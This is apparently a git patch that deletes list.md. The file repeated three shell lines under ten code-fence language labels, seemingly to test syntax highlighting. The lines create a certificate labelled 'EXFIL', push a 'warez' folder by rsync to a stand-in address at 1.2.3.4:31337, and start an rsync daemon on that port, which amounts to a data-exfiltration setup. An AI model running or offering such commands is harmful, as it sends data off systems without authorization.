From d9d30a47c8106f10ca38e01351433aec01228a43 Mon Sep 17 00:00:00 2001 From: SkyperTHC Date: Mon, 18 Sep 2023 12:58:03 +0100 Subject: [PATCH] list --- list.md | 79 --------------------------------------------------------- 1 file changed, 79 deletions(-) delete mode 100644 list.md diff --git a/list.md b/list.md deleted file mode 100644 index 81d8343..0000000 --- a/list.md +++ /dev/null @@ -1,79 +0,0 @@ -applescript -```applescript -# this is a comment -openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -rsync -av warez rsync://1.2.3.4:31337/up -rsync --daemon --port=31337 --config=r.conf --no-detach -``` - -elixir -```elixir -# this is a comment -openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -rsync -av warez rsync://1.2.3.4:31337/up -rsync --daemon --port=31337 --config=r.conf --no-detach -``` - -julia -```julia -# this is a comment -openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -rsync -av warez rsync://1.2.3.4:31337/up -rsync --daemon --port=31337 --config=r.conf --no-detach -``` - -livescript -```livescript -# this is a comment -openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -rsync -av warez rsync://1.2.3.4:31337/up -rsync --daemon --port=31337 --config=r.conf --no-detach -``` - -pgsql -```pgsql -# this is a comment -openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -rsync -av warez rsync://1.2.3.4:31337/up -rsync --daemon --port=31337 --config=r.conf --no-detach -``` - -php -```php -# this is a comment -openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -rsync -av warez rsync://1.2.3.4:31337/up -rsync --daemon --port=31337 --config=r.conf --no-detach -``` - -powershell -```powershell -# this is a comment -openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -rsync -av warez rsync://1.2.3.4:31337/up -rsync --daemon --port=31337 --config=r.conf --no-detach -``` - -r -```r -# this is a comment -openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -rsync -av warez rsync://1.2.3.4:31337/up -rsync --daemon --port=31337 --config=r.conf --no-detach -``` - -ruby -```ruby -# this is a comment -openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -rsync -av warez rsync://1.2.3.4:31337/up -rsync --daemon --port=31337 --config=r.conf --no-detach -``` - -sql -```sql -# this is a comment -openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -rsync -av warez rsync://1.2.3.4:31337/up -rsync --daemon --port=31337 --config=r.conf --no-detach -```